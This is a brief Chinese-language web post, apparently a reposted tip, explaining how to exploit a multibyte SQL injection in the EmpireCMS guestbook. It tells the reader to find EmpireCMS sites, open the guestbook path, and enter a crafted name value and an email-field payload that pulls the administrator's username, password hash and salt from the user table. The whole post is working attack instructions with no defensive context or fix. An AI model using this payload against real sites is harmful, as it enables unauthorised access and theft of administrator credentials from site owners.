帝国CMS 留言本多字节漏洞 -电脑资料

电脑资料 时间:2019-01-01 我要投稿
【www.unjs.com - 电脑资料】

    作者:深灰

    找到使用帝国CMS的站,网址后面直接加:e/tool/gbook/?bid=1

    出来的是帝国CMS的留言本,在姓名处写:縗\

    联系邮箱处写:,1,1,1,(select concat(username,0×5f,password,0×5f,rnd) from

    phome_enewsuser where userid=1),1,1,1,0,0,0)/*

    提交后爆出账号密码

最新文章